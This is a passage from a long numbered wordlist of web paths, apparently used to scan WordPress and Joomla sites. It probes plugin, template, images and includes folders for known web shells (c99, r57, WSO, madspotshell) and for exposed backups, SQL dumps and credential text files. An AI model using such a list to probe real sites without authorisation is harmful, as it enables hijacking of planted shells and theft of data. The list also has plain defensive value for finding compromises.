3030. '/wp-content/plugins/disqus-comment-system/WolF.php',
3031. '/wp-content/plugins/disqus-comment-system/madspot.php',
3032. '/wp-content/plugins/disqus-comment-system/Cgishell.pl',
3033. '/wp-content/plugins/disqus-comment-system/killer.php',
3034. '/wp-content/plugins/disqus-comment-system/changeall.php',
3035. '/wp-content/plugins/disqus-comment-system/2.php',
3036. '/wp-content/plugins/disqus-comment-system/Sh3ll.php',
3037. '/wp-content/plugins/disqus-comment-system/dz0.php',
3038. '/wp-content/plugins/disqus-comment-system/dam.php',
3039. '/wp-content/plugins/disqus-comment-system/user.php',
3040. '/wp-content/plugins/disqus-comment-system/dom.php',
3041. '/wp-content/plugins/disqus-comment-system/whmcs.php',
3042. '/wp-content/plugins/disqus-comment-system/vb.zip',
3043. '/wp-content/plugins/disqus-comment-system/r00t.php',
3044. '/wp-content/plugins/disqus-comment-system/c99.php',
3045. '/wp-content/plugins/disqus-comment-system/gaza.php',
3046. '/wp-content/plugins/disqus-comment-system/1.php',
3047. '/wp-content/plugins/disqus-comment-system/d0mains.php',
3048. '/wp-content/plugins/disqus-comment-system/madspotshell.php',
3049. '/wp-content/plugins/disqus-comment-system/info.php',
3050. '/wp-content/plugins/disqus-comment-system/egyshell.php',
3051. '/wp-content/plugins/disqus-comment-system/Sym.php',
3052. '/wp-content/plugins/disqus-comment-system/c22.php',
3053. '/wp-content/plugins/disqus-comment-system/c100.php',
3054. '/wp-content/plugins/disqus-comment-system/configuration.php',
3055. '/wp-content/plugins/disqus-comment-system/g.php',
3056. '/wp-content/plugins/disqus-comment-system/xx.pl',
3057. '/wp-content/plugins/disqus-comment-system/ls.php',
3058. '/wp-content/plugins/disqus-comment-system/Cpanel.php',
3059. '/wp-content/plugins/disqus-comment-system/k.php',
3060. '/wp-content/plugins/disqus-comment-system/zone-h.php',
3061. '/wp-content/plugins/disqus-comment-system/tmp/user.php',
3062. '/wp-content/plugins/disqus-comment-system/tmp/Sym.php',
3063. '/wp-content/plugins/disqus-comment-system/cp.php',
3064. '/wp-content/plugins/disqus-comment-system/tmp/madspotshell.php',
3065. '/wp-content/plugins/disqus-comment-system/tmp/root.php',
3066. '/wp-content/plugins/disqus-comment-system/tmp/whmcs.php',
3067. '/wp-content/plugins/disqus-comment-system/tmp/index.php',
3068. '/wp-content/plugins/disqus-comment-system/tmp/2.php',
3069. '/wp-content/plugins/disqus-comment-system/tmp/dz.php',
3070. '/wp-content/plugins/disqus-comment-system/tmp/cpn.php',
3071. '/wp-content/plugins/disqus-comment-system/tmp/changeall.php',
3072. '/wp-content/plugins/disqus-comment-system/tmp/Cgishell.pl',
3073. '/wp-content/plugins/disqus-comment-system/tmp/sql.php',
3074. '/wp-content/plugins/disqus-comment-system/0day.php',
3075. '/wp-content/plugins/disqus-comment-system/tmp/admin.php',
3076. '/wp-content/plugins/disqus-comment-system/L3b.php',
3077. '/wp-content/plugins/disqus-comment-system/d.php',
3078. '/wp-content/plugins/disqus-comment-system/tmp/d.php',
3079. '/wp-content/plugins/disqus-comment-system/tmp/L3b.php',
3080. '/wp-content/plugins/disqus-comment-system/sado.php',
3081. '/wp-content/plugins/disqus-comment-system/admin1.php',
3082. '/wp-content/plugins/disqus-comment-system/upload.php',
3083. '/wp-content/plugins/disqus-comment-system/up.php',
3084. '/wp-content/plugins/disqus-comment-system/vb.zip',
3085. '/wp-content/plugins/disqus-comment-system/vb.rar',
3086. '/wp-content/plugins/disqus-comment-system/admin2.asp',
3087. '/wp-content/plugins/disqus-comment-system/uploads.php',
3088. '/wp-content/plugins/disqus-comment-system/sa.php',
3089. '/wp-content/plugins/disqus-comment-system/sysadmins/',
3090. '/wp-content/plugins/disqus-comment-system/admin1/',
3091. '/wp-content/plugins/disqus-comment-system/sniper.php',
3092. '/wp-content/plugins/disqus-comment-system/images/Sym.php',
3093. '/wp-content/plugins/disqus-comment-system//r57.php',
3094. '/wp-content/plugins/disqus-comment-system/gzaa_spysl',
3095. '/wp-content/plugins/disqus-comment-system/sql-new.php',
3096. '/wp-content/plugins/disqus-comment-system//shell.php',
3097. '/wp-content/plugins/disqus-comment-system//sa.php',
3098. '/wp-content/plugins/disqus-comment-system//admin.php',
3099. '/wp-content/plugins/disqus-comment-system//sa2.php',
3100. '/wp-content/plugins/disqus-comment-system//2.php',
3101. '/wp-content/plugins/disqus-comment-system//gaza.php',
3102. '/wp-content/plugins/disqus-comment-system//up.php',
3103. '/wp-content/plugins/disqus-comment-system//upload.php',
3104. '/wp-content/plugins/disqus-comment-system//uploads.php',
3105. '/wp-content/plugins/disqus-comment-system/shell.php',
3106. '/wp-content/plugins/disqus-comment-system//amad.php',
3107. '/wp-content/plugins/disqus-comment-system//t00.php',
3108. 'pwp-content/plugins/disqus-comment-system/disqus.php',
3109. 'wp-content/plugins/akismet/WSO.php',
3110. 'wp-content/plugins/akismet/dz.php',
3111. 'wp-content/plugins/akismet/DZ.php',
3112. 'wp-content/plugins/akismet/cpanel.php',
3113. 'wp-content/plugins/akismet/cpn.php',
3114. 'wp-content/plugins/akismet/sos.php',
3115. 'wp-content/plugins/akismet/term.php',
3116. 'wp-content/plugins/akismet/Sec-War.php',
3117. 'wp-content/plugins/akismet/sql.php',
3118. 'wp-content/plugins/akismet/ssl.php',
3119. 'wp-content/plugins/akismet/mysql.php',
3120. 'wp-content/plugins/akismet/WolF.php',
3121. 'wp-content/plugins/akismet/madspot.php',
3122. 'wp-content/plugins/akismet/Cgishell.pl',
3123. 'wp-content/plugins/akismet/killer.php',
3124. 'wp-content/plugins/akismet/changeall.php',
3125. 'wp-content/plugins/akismet/2.php',
3126. 'wp-content/plugins/akismet/Sh3ll.php',
3127. 'wp-content/plugins/akismet/dz0.php',
3128. 'wp-content/plugins/akismet/dam.php',
3129. 'wp-content/plugins/akismet/user.php',
3130. 'wp-content/plugins/akismet/dom.php',
3131. 'wp-content/plugins/akismet/whmcs.php',
3132. 'wp-content/plugins/akismet/vb.zip',
3133. 'wp-content/plugins/akismet/r00t.php',
3134. 'wp-content/plugins/akismet/c99.php',
3135. 'wp-content/plugins/akismet/gaza.php',
3136. 'wp-content/plugins/akismet/1.php',
3137. 'wp-content/plugins/akismet/d0mains.php',
3138. 'wp-content/plugins/akismet/madspotshell.php',
3139. 'wp-content/plugins/akismet/info.php',
3140. 'wp-content/plugins/akismet/egyshell.php',
3141. 'wp-content/plugins/akismet/Sym.php',
3142. 'wp-content/plugins/akismet/c22.php',
3143. 'wp-content/plugins/akismet/c100.php',
3144. 'wp-content/plugins/akismet/configuration.php',
3145. 'wp-content/plugins/akismet/g.php',
3146. 'wp-content/plugins/akismet/xx.pl',
3147. 'wp-content/plugins/akismet/ls.php',
3148. 'wp-content/plugins/akismet/Cpanel.php',
3149. 'wp-content/plugins/akismet/k.php',
3150. 'wp-content/plugins/akismet/zone-h.php',
3151. 'wp-content/plugins/akismet/tmp/user.php',
3152. 'wp-content/plugins/akismet/tmp/Sym.php',
3153. 'wp-content/plugins/akismet/cp.php',
3154. 'wp-content/plugins/akismet/tmp/madspotshell.php',
3155. 'wp-content/plugins/akismet/tmp/root.php',
3156. 'wp-content/plugins/akismet/tmp/whmcs.php',
3157. 'wp-content/plugins/akismet/tmp/index.php',
3158. 'wp-content/plugins/akismet/tmp/2.php',
3159. 'wp-content/plugins/akismet/tmp/dz.php',
3160. 'wp-content/plugins/akismet/tmp/cpn.php',
3161. 'wp-content/plugins/akismet/tmp/changeall.php',
3162. 'wp-content/plugins/akismet/tmp/Cgishell.pl',
3163. 'wp-content/plugins/akismet/tmp/sql.php',
3164. 'wp-content/plugins/akismet/0day.php',
3165. 'wp-content/plugins/akismet/tmp/admin.php',
3166. 'wp-content/plugins/akismet/L3b.php',
3167. 'wp-content/plugins/akismet/d.php',
3168. 'wp-content/plugins/akismet/tmp/d.php',
3169. 'wp-content/plugins/akismet/tmp/L3b.php',
3170. 'wp-content/plugins/akismet/sado.php',
3171. 'wp-content/plugins/akismet/admin1.php',
3172. 'wp-content/plugins/akismet/upload.php',
3173. 'wp-content/plugins/akismet/up.php',
3174. 'wp-content/plugins/akismet/vb.zip',
3175. 'wp-content/plugins/akismet/vb.rar',
3176. 'wp-content/plugins/akismet/admin2.asp',
3177. 'wp-content/plugins/akismet/uploads.php',
3178. 'wp-content/plugins/akismet/sa.php',
3179. 'wp-content/plugins/akismet/sysadmins/',
3180. 'wp-content/plugins/akismet/admin1/',
3181. 'wp-content/plugins/akismet/sniper.php',
3182. 'wp-content/plugins/akismet/images/Sym.php',
3183. 'wp-content/plugins/akismet//r57.php',
3184. 'wp-content/plugins/akismet/gzaa_spysl',
3185. 'wp-content/plugins/akismet/sql-new.php',
3186. 'wp-content/plugins/akismet//shell.php',
3187. 'wp-content/plugins/akismet//sa.php',
3188. 'wp-content/plugins/akismet//admin.php',
3189. 'wp-content/plugins/akismet//sa2.php',
3190. 'wp-content/plugins/akismet//2.php',
3191. 'wp-content/plugins/akismet//gaza.php',
3192. 'wp-content/plugins/akismet//up.php',
3193. 'wp-content/plugins/akismet//upload.php',
3194. 'wp-content/plugins/akismet//uploads.php',
3195. 'wp-content/plugins/akismet/shell.php',
3196. 'wp-content/plugins/akismet//amad.php',
3197. 'wp-content/plugins/akismet//t00.php',
3198. 'wp-content/plugins/akismet//dz.php',
3199. 'wp-content/plugins/akismet//site.rar',
3200. 'wp-content/plugins/akismet//Black.php',
3201. 'wp-content/plugins/akismet//site.tar.gz',
3202. 'wp-content/plugins/akismet//home.zip',
3203. 'wp-content/plugins/akismet//home.rar',
3204. 'wp-content/plugins/akismet//home.tar',
3205. 'wp-content/plugins/akismet//home.tar.gz',
3206. 'wp-content/plugins/akismet//forum.zip',
3207. 'wp-content/plugins/akismet//forum.rar',
3208. 'wp-content/plugins/akismet//forum.tar',
3209. 'wp-content/plugins/akismet//forum.tar.gz',
3210. 'wp-content/plugins/akismet//test.txt',
3211. 'wp-content/plugins/akismet//ftp.txt',
3212. 'wp-content/plugins/akismet//user.txt',
3213. 'wp-content/plugins/akismet//site.txt',
3214. 'wp-content/plugins/akismet//error_log',
3215. 'wp-content/plugins/akismet//error',
3216. 'wp-content/plugins/akismet//cpanel',
3217. 'wp-content/plugins/akismet//awstats',
3218. 'wp-content/plugins/akismet//site.sql',
3219. 'wp-content/plugins/akismet//vb.sql',
3220. 'wp-content/plugins/akismet//forum.sql',
3221. 'wp-content/plugins/akismet/r00t-s3c.php',
3222. 'wp-content/plugins/akismet/c.php',
3223. 'wp-content/plugins/akismet//backup.sql',
3224. 'wp-content/plugins/akismet//back.sql',
3225. 'wp-content/plugins/akismet//data.sql',
3226. 'wp-content/plugins/akismet/wp.rar/',
3227. 'wp-content/plugins/akismet/asp.aspx',
3228. 'wp-content/plugins/akismet/tmp/vaga.php',
3229. 'wp-content/plugins/akismet/tmp/killer.php',
3230. 'wp-content/plugins/akismet/whmcs.php',
3231. 'wp-content/plugins/akismet/abuhlail.php',
3232. 'wp-content/plugins/akismet/tmp/killer.php',
3233. 'wp-content/plugins/akismet/tmp/domaine.pl',
3234. 'wp-content/plugins/akismet/tmp/domaine.php',
3235. 'wp-content/plugins/akismet/useradmin/',
3236. 'wp-content/plugins/akismet/tmp/d0maine.php',
3237. 'wp-content/plugins/akismet/d0maine.php',
3238. 'wp-content/plugins/akismet/tmp/sql.php',
3239. 'wp-content/plugins/akismet/X.php',
3240. 'wp-content/plugins/akismet/123.php',
3241. 'wp-content/plugins/akismet/m.php',
3242. 'wp-content/plugins/akismet/b.php',
3243. 'wp-content/plugins/akismet/up.php',
3244. 'wp-content/plugins/akismet/tmp/dz1.php',
3245. 'wp-content/plugins/akismet/dz1.php',
3246. 'wp-content/plugins/akismet/forum.zip',
3247. 'wp-content/plugins/akismet/Symlink.php',
3248. 'wp-content/plugins/akismet/Symlink.pl',
3249. 'wp-content/plugins/akismet/forum.rar',
3250. 'wp-content/plugins/akismet/joomla.zip',
3251. 'wp-content/plugins/akismet/joomla.rar',
3252. 'wp-content/plugins/akismet/wp.php',
3253. 'wp-content/plugins/akismet/buck.sql',
3254. 'wp-content/plugins/akismet/sysadmin.php',
3255. 'wp-content/plugins/akismet/images/c99.php',
3256. 'wp-content/plugins/akismet/xd.php',
3257. 'wp-content/plugins/akismet/c100.php',
3258. 'wp-content/plugins/akismet/spy.aspx',
3259. 'wp-content/plugins/akismet/xd.php',
3260. 'wp-content/plugins/akismet/tmp/xd.php',
3261. 'wp-content/plugins/akismet/sym/root/home/',
3262. 'wp-content/plugins/akismet/billing/killer.php',
3263. 'wp-content/plugins/akismet/tmp/upload.php',
3264. 'wp-content/plugins/akismet/tmp/admin.php',
3265. 'wp-content/plugins/akismet/Server.php',
3266. 'wp-content/plugins/akismet/tmp/uploads.php',
3267. 'wp-content/plugins/akismet/tmp/up.php',
3268. 'wp-content/plugins/akismet/Server/',
3269. 'wp-content/plugins/akismet/wp-admin/c99.php',
3270. 'wp-content/plugins/akismet/tmp/priv8.php',
3271. 'wp-content/plugins/akismet/priv8.php',
3272. 'wp-content/plugins/akismet/cgi.pl/',
3273. 'wp-content/plugins/akismet/tmp/cgi.pl',
3274. 'wp-content/plugins/akismet/downloads/dom.php',
3275. 'wp-content/plugins/akismet/webadmin.html',
3276. 'wp-content/plugins/akismet/admins.php',
3277. 'wp-content/plugins/akismet/bluff.php',
3278. 'wp-content/plugins/akismet/king.jeen',
3279. 'wp-content/plugins/akismet/admins/',
3280. 'wp-content/plugins/akismet/admins.asp',
3281. 'wp-content/plugins/akismet/admins.php',
3282. 'wp-content/plugins/akismet/wp.zip',
3283. 'wp-content/plugins/akismet/disqus.php',
3284. 'wp-content/plugins/google-sitemap-generator//cpanel',
3285. 'wp-content/plugins/google-sitemap-generator//awstats',
3286. 'wp-content/plugins/google-sitemap-generator//site.sql',
3287. 'wp-content/plugins/google-sitemap-generator//vb.sql',
3288. 'wp-content/plugins/google-sitemap-generator//forum.sql',
3289. 'wp-content/plugins/google-sitemap-generator/r00t-s3c.php',
3290. 'wp-content/plugins/google-sitemap-generator/c.php',
3291. 'wp-content/plugins/google-sitemap-generator//backup.sql',
3292. 'wp-content/plugins/google-sitemap-generator//back.sql',
3293. 'wp-content/plugins/google-sitemap-generator//data.sql',
3294. 'wp-content/plugins/google-sitemap-generator/wp.rar/',
3295. 'wp-content/plugins/google-sitemap-generator/asp.aspx',
3296. 'wp-content/plugins/google-sitemap-generator/tmp/vaga.php',
3297. 'wp-content/plugins/google-sitemap-generator/tmp/killer.php',
3298. 'wp-content/plugins/google-sitemap-generator/whmcs.php',
3299. 'wp-content/plugins/google-sitemap-generator/abuhlail.php',
3300. 'wp-content/plugins/google-sitemap-generator/tmp/killer.php',
3301. 'wp-content/plugins/google-sitemap-generator/tmp/domaine.pl',
3302. 'wp-content/plugins/google-sitemap-generator/tmp/domaine.php',
3303. 'wp-content/plugins/google-sitemap-generator/useradmin/',
3304. 'wp-content/plugins/google-sitemap-generator/tmp/d0maine.php',
3305. 'wp-content/plugins/google-sitemap-generator/d0maine.php',
3306. 'wp-content/plugins/google-sitemap-generator/tmp/sql.php',
3307. 'wp-content/plugins/google-sitemap-generator/X.php',
3308. 'wp-content/plugins/google-sitemap-generator/123.php',
3309. 'wp-content/plugins/google-sitemap-generator/m.php',
3310. 'wp-content/plugins/google-sitemap-generator/b.php',
3311. 'wp-content/plugins/google-sitemap-generator/up.php',
3312. 'wp-content/plugins/google-sitemap-generator/tmp/dz1.php',
3313. 'wp-content/plugins/google-sitemap-generator/dz1.php',
3314. 'wp-content/plugins/google-sitemap-generator/forum.zip',
3315. 'wp-content/plugins/google-sitemap-generator/Symlink.php',
3316. 'wp-content/plugins/google-sitemap-generator/Symlink.pl',
3317. 'wp-content/plugins/google-sitemap-generator/forum.rar',
3318. 'wp-content/plugins/google-sitemap-generator/joomla.zip',
3319. 'wp-content/plugins/google-sitemap-generator/joomla.rar',
3320. 'wp-content/plugins/google-sitemap-generator/wp.php',
3321. 'wp-content/plugins/google-sitemap-generator/buck.sql',
3322. 'wp-content/plugins/google-sitemap-generator/sysadmin.php',
3323. 'wp-content/plugins/google-sitemap-generator/images/c99.php',
3324. 'wp-content/plugins/google-sitemap-generator/xd.php',
3325. 'wp-content/plugins/google-sitemap-generator/c100.php',
3326. 'wp-content/plugins/google-sitemap-generator/spy.aspx',
3327. 'wp-content/plugins/google-sitemap-generator/xd.php',
3328. 'wp-content/plugins/google-sitemap-generator/tmp/xd.php',
3329. 'wp-content/plugins/google-sitemap-generator/sym/root/home/',
3330. 'wp-content/plugins/google-sitemap-generator/billing/killer.php',
3331. 'wp-content/plugins/google-sitemap-generator/tmp/upload.php',
3332. 'wp-content/plugins/google-sitemap-generator/tmp/admin.php',
3333. 'wp-content/plugins/google-sitemap-generator/Server.php',
3334. 'wp-content/plugins/google-sitemap-generator/tmp/uploads.php',
3335. 'wp-content/plugins/google-sitemap-generator/tmp/up.php',
3336. 'wp-content/plugins/google-sitemap-generator/Server/',
3337. 'wp-content/plugins/google-sitemap-generator/wp-admin/c99.php',
3338. 'wp-content/plugins/google-sitemap-generator/tmp/priv8.php',
3339. 'wp-content/plugins/google-sitemap-generator/priv8.php',
3340. 'wp-content/plugins/google-sitemap-generator/cgi.pl/',
3341. 'wp-content/plugins/google-sitemap-generator/tmp/cgi.pl',
3342. 'wp-content/plugins/google-sitemap-generator/downloads/dom.php',
3343. 'wp-content/plugins/google-sitemap-generator/webadmin.html',
3344. 'wp-content/plugins/google-sitemap-generator/admins.php',
3345. 'wp-content/plugins/google-sitemap-generator/bluff.php',
3346. 'wp-content/plugins/google-sitemap-generator/king.jeen',
3347. 'wp-content/plugins/google-sitemap-generator/admins/',
3348. 'wp-content/plugins/google-sitemap-generator/admins.asp',
3349. 'wp-content/plugins/google-sitemap-generator/admins.php',
3350. 'wp-content/plugins/google-sitemap-generator/wp.zip',
3351. 'wp-content/plugins/google-sitemap-generator/sitemap-core.php',
3352. '/templates/beez/WSO.php',
3353. '/templates/beez/dz.php',
3354. '/templates/beez/DZ.php',
3355. '/templates/beez/cpanel.php',
3356. '/templates/beez/cpn.php',
3357. '/templates/beez/sos.php',
3358. '/templates/beez/term.php',
3359. '/templates/beez/Sec-War.php',
3360. '/templates/beez/sql.php',
3361. '/templates/beez/ssl.php',
3362. '/templates/beez/mysql.php',
3363. '/templates/beez/WolF.php',
3364. '/templates/beez/madspot.php',
3365. '/templates/beez/Cgishell.pl',
3366. '/templates/beez/killer.php',
3367. '/templates/beez/changeall.php',
3368. '/templates/beez/2.php',
3369. '/templates/beez/Sh3ll.php',
3370. '/templates/beez/dz0.php',
3371. '/templates/beez/dam.php',
3372. '/templates/beez/user.php',
3373. '/templates/beez/dom.php',
3374. '/templates/beez/whmcs.php',
3375. '/templates/beez/vb.zip',
3376. '/templates/beez/r00t.php',
3377. '/templates/beez/c99.php',
3378. '/templates/beez/gaza.php',
3379. '/templates/beez/1.php',
3380. '/templates/beez/d0mains.php',
3381. '/templates/beez/madspotshell.php',
3382. '/templates/beez/info.php',
3383. '/templates/beez/egyshell.php',
3384. '/templates/beez/Sym.php',
3385. '/templates/beez/c22.php',
3386. '/templates/beez/c100.php',
3387. '/templates/beez/configuration.php',
3388. '/templates/beez/g.php',
3389. '/templates/beez/xx.pl',
3390. '/templates/beez/ls.php',
3391. '/templates/beez/Cpanel.php',
3392. '/templates/beez/k.php',
3393. '/templates/beez/zone-h.php',
3394. '/templates/beez/tmp/user.php',
3395. '/templates/beez/tmp/Sym.php',
3396. '/templates/beez/cp.php',
3397. '/templates/beez/tmp/madspotshell.php',
3398. '/templates/beez/tmp/root.php',
3399. '/templates/beez/tmp/whmcs.php',
3400. '/templates/beez/tmp/index.php',
3401. '/templates/beez/tmp/2.php',
3402. '/templates/beez/tmp/dz.php',
3403. '/templates/beez/tmp/cpn.php',
3404. '/templates/beez/tmp/changeall.php',
3405. '/templates/beez/tmp/Cgishell.pl',
3406. '/templates/beez/tmp/sql.php',
3407. '/templates/beez/0day.php',
3408. '/templates/beez/tmp/admin.php',
3409. '/templates/beez/L3b.php',
3410. '/templates/beez/d.php',
3411. '/templates/beez/tmp/d.php',
3412. '/templates/beez/tmp/L3b.php',
3413. '/templates/beez/sado.php',
3414. '/templates/beez/admin1.php',
3415. '/templates/beez/upload.php',
3416. '/templates/beez/up.php',
3417. '/templates/beez/vb.zip',
3418. '/templates/beez/vb.rar',
3419. '/templates/beez/admin2.asp',
3420. '/templates/beez/uploads.php',
3421. '/templates/beez/sa.php',
3422. '/templates/beez/sysadmins/',
3423. '/templates/beez/admin1/',
3424. '/templates/beez/sniper.php',
3425. '/templates/beez/images/Sym.php',
3426. '/templates/beez//r57.php',
3427. '/templates/beez/gzaa_spysl',
3428. '/templates/beez/sql-new.php',
3429. '/templates/beez//shell.php',
3430. '/templates/beez//sa.php',
3431. '/templates/beez//admin.php',
3432. '/templates/beez//sa2.php',
3433. '/templates/beez//2.php',
3434. '/templates/beez//gaza.php',
3435. '/templates/beez//up.php',
3436. '/templates/beez//upload.php',
3437. '/templates/beez//uploads.php',
3438. '/templates/beez/shell.php',
3439. '/templates/beez//amad.php',
3440. '/templates/beez//t00.php',
3441. '/templates/beez//dz.php',
3442. '/templates/beez//site.rar',
3443. '/templates/beez//Black.php',
3444. '/templates/beez//site.tar.gz',
3445. '/templates/beez//home.zip',
3446. '/templates/beez//home.rar',
3447. '/templates/beez//home.tar',
3448. '/templates/beez//home.tar.gz',
3449. '/templates/beez//forum.zip',
3450. '/templates/beez//forum.rar',
3451. '/templates/beez//forum.tar',
3452. '/templates/beez//forum.tar.gz',
3453. '/templates/beez//test.txt',
3454. '/templates/beez//ftp.txt',
3455. '/templates/beez//user.txt',
3456. '/templates/beez//site.txt',
3457. '/templates/beez//error_log',
3458. '/templates/beez//error',
3459. '/templates/beez//cpanel',
3460. '/templates/beez//awstats',
3461. '/templates/beez//site.sql',
3462. '/templates/beez//vb.sql',
3463. '/templates/beez//forum.sql',
3464. '/templates/beez/r00t-s3c.php',
3465. '/templates/beez/c.php',
3466. '/templates/beez//backup.sql',
3467. '/templates/beez//back.sql',
3468. '/templates/beez//data.sql',
3469. '/templates/beez/wp.rar/',
3470. '/templates/beez/asp.aspx',
3471. '/templates/beez/tmp/vaga.php',
3472. '/templates/beez/tmp/killer.php',
3473. '/templates/beez/whmcs.php',
3474. '/templates/beez/abuhlail.php',
3475. '/templates/beez/tmp/killer.php',
3476. '/templates/beez/tmp/domaine.pl',
3477. '/templates/beez/tmp/domaine.php',
3478. '/templates/beez/useradmin/',
3479. '/templates/beez/tmp/d0maine.php',
3480. '/templates/beez/d0maine.php',
3481. '/templates/beez/tmp/sql.php',
3482. '/templates/beez/X.php',
3483. '/templates/beez/123.php',
3484. '/templates/beez/m.php',
3485. '/templates/beez/b.php',
3486. '/templates/beez/up.php',
3487. '/templates/beez/tmp/dz1.php',
3488. '/templates/beez/dz1.php',
3489. '/templates/beez/forum.zip',
3490. '/templates/beez/Symlink.php',
3491. '/templates/beez/Symlink.pl',
3492. '/templates/beez/forum.rar',
3493. '/templates/beez/joomla.zip',
3494. '/templates/beez/joomla.rar',
3495. '/templates/beez/wp.php',
3496. '/templates/beez/buck.sql',
3497. '/templates/beez/sysadmin.php',
3498. '/templates/beez/images/c99.php',
3499. '/templates/beez/xd.php',
3500. '/templates/beez/c100.php',
3501. '/templates/beez/spy.aspx',
3502. '/templates/beez/xd.php',
3503. '/templates/beez/tmp/xd.php',
3504. '/templates/beez/sym/root/home/',
3505. '/templates/beez/billing/killer.php',
3506. '/templates/beez/tmp/upload.php',
3507. '/templates/beez/tmp/admin.php',
3508. '/templates/beez/Server.php',
3509. '/templates/beez/tmp/uploads.php',
3510. '/templates/beez/tmp/up.php',
3511. '/templates/beez/Server/',
3512. '/templates/beez/wp-admin/c99.php',
3513. '/templates/beez/tmp/priv8.php',
3514. '/templates/beez/priv8.php',
3515. '/templates/beez/cgi.pl/',
3516. '/templates/beez/tmp/cgi.pl',
3517. '/templates/beez/downloads/dom.php',
3518. '/templates/beez/webadmin.html',
3519. '/templates/beez/admins.php',
3520. '/templates/beez/bluff.php',
3521. '/templates/beez/king.jeen',
3522. '/templates/beez/admins/',
3523. '/templates/beez/admins.asp',
3524. '/templates/beez/admins.php',
3525. '/templates/beez/wp.zip',
3526. '/templates/beez/index.php','/images/WSO.php',
3527. '/images/dz.php',
3528. '/images/DZ.php',
3529. '/images/cpanel.php',
3530. '/images/cpn.php',
3531. '/images/sos.php',
3532. '/images/term.php',
3533. '/images/Sec-War.php',
3534. '/images/sql.php',
3535. '/images/ssl.php',
3536. '/images/mysql.php',
3537. '/images/WolF.php',
3538. '/images/madspot.php',
3539. '/images/Cgishell.pl',
3540. '/images/killer.php',
3541. '/images/changeall.php',
3542. '/images/2.php',
3543. '/images/Sh3ll.php',
3544. '/images/dz0.php',
3545. '/images/dam.php',
3546. '/images/user.php',
3547. '/images/dom.php',
3548. '/images/whmcs.php',
3549. '/images/vb.zip',
3550. '/images/r00t.php',
3551. '/images/c99.php',
3552. '/images/gaza.php',
3553. '/images/1.php',
3554. '/images/d0mains.php',
3555. '/images/madspotshell.php',
3556. '/images/info.php',
3557. '/images/egyshell.php',
3558. '/images/Sym.php',
3559. '/images/c22.php',
3560. '/images/c100.php',
3561. '/images/configuration.php',
3562. '/images/g.php',
3563. '/images/xx.pl',
3564. '/images/ls.php',
3565. '/images/Cpanel.php',
3566. '/images/k.php',
3567. '/images/zone-h.php',
3568. '/images/tmp/user.php',
3569. '/images/tmp/Sym.php',
3570. '/images/cp.php',
3571. '/images/tmp/madspotshell.php',
3572. '/images/tmp/root.php',
3573. '/images/tmp/whmcs.php',
3574. '/images/tmp/index.php',
3575. '/images/tmp/2.php',
3576. '/images/tmp/dz.php',
3577. '/images/tmp/cpn.php',
3578. '/images/tmp/changeall.php',
3579. '/images/tmp/Cgishell.pl',
3580. '/images/tmp/sql.php',
3581. '/images/0day.php',
3582. '/images/tmp/admin.php',
3583. '/images/L3b.php',
3584. '/images/d.php',
3585. '/images/tmp/d.php',
3586. '/images/tmp/L3b.php',
3587. '/images/sado.php',
3588. '/images/admin1.php',
3589. '/images/upload.php',
3590. '/images/up.php',
3591. '/images/vb.zip',
3592. '/images/vb.rar',
3593. '/images/admin2.asp',
3594. '/images/uploads.php',
3595. '/images/sa.php',
3596. '/images/sysadmins/',
3597. '/images/admin1/',
3598. '/images/sniper.php',
3599. '/images/images/Sym.php',
3600. '/images//r57.php',
3601. '/images/gzaa_spysl',
3602. '/images/sql-new.php',
3603. '/images//shell.php',
3604. '/images//sa.php',
3605. '/images//admin.php',
3606. '/images//sa2.php',
3607. '/images//2.php',
3608. '/images//gaza.php',
3609. '/images//up.php',
3610. '/images//upload.php',
3611. '/images//uploads.php',
3612. '/images/shell.php',
3613. '/images//amad.php',
3614. '/images//t00.php',
3615. '/images//dz.php',
3616. '/images//site.rar',
3617. '/images//Black.php',
3618. '/images//site.tar.gz',
3619. '/images//home.zip',
3620. '/images//home.rar',
3621. '/images//home.tar',
3622. '/images//home.tar.gz',
3623. '/images//forum.zip',
3624. '/images//forum.rar',
3625. '/images//forum.tar',
3626. '/images//forum.tar.gz',
3627. '/images//test.txt',
3628. '/images//ftp.txt',
3629. '/images//user.txt',
3630. '/images//site.txt',
3631. '/images//error_log',
3632. '/images//error',
3633. '/images//cpanel',
3634. '/images//awstats',
3635. '/images//site.sql',
3636. '/images//vb.sql',
3637. '/images//forum.sql',
3638. '/images/r00t-s3c.php',
3639. '/images/c.php',
3640. '/images//backup.sql',
3641. '/images//back.sql',
3642. '/images//data.sql',
3643. '/images/wp.rar/',
3644. '/images/asp.aspx',
3645. '/images/tmp/vaga.php',
3646. '/images/tmp/killer.php',
3647. '/images/whmcs.php',
3648. '/images/abuhlail.php',
3649. '/images/tmp/killer.php',
3650. '/images/tmp/domaine.pl',
3651. '/images/tmp/domaine.php',
3652. '/images/useradmin/',
3653. '/images/tmp/d0maine.php',
3654. '/images/d0maine.php',
3655. '/images/tmp/sql.php',
3656. '/images/X.php',
3657. '/images/123.php',
3658. '/images/m.php',
3659. '/images/b.php',
3660. '/images/up.php',
3661. '/images/tmp/dz1.php',
3662. '/images/dz1.php',
3663. '/images/forum.zip',
3664. '/images/Symlink.php',
3665. '/images/Symlink.pl',
3666. '/images/forum.rar',
3667. '/images/joomla.zip',
3668. '/images/joomla.rar',
3669. '/images/wp.php',
3670. '/images/buck.sql',
3671. '/includes/WSO.php',
3672. '/includes/dz.php',
3673. '/includes/DZ.php',
3674. '/includes/cpanel.php',
3675. '/includes/cpn.php',
3676. '/includes/sos.php',
3677. '/includes/term.php',
3678. '/includes/Sec-War.php',
3679. '/includes/sql.php',
3680. '/includes/ssl.php',
3681. '/includes/mysql.php',
3682. '/includes/WolF.php',
3683. '/includes/madspot.php',
3684. '/includes/Cgishell.pl',
3685. '/includes/killer.php',
3686. '/includes/changeall.php',
3687. '/includes/2.php',
3688. '/includes/Sh3ll.php',
3689. '/includes/dz0.php',
3690. '/includes/dam.php',
3691. '/includes/user.php',
3692. '/includes/dom.php',
3693. '/includes/whmcs.php',
3694. '/includes/vb.zip',
3695. '/includes/r00t.php',
3696. '/includes/c99.php',
3697. '/includes/gaza.php',
3698. '/includes/1.php',
3699. '/includes/d0mains.php',
3700. '/includes/madspotshell.php',
3701. '/includes/info.php',
3702. '/includes/egyshell.php',
3703. '/includes/Sym.php',
3704. '/includes/c22.php',
3705. '/includes/c100.php',
3706. '/includes/configuration.php',
3707. '/includes/g.php',
3708. '/includes/xx.pl',
3709. '/includes/ls.php',
3710. '/includes/Cpanel.php',
3711. '/includes/k.php',
3712. '/includes/zone-h.php',
3713. '/includes/tmp/user.php',
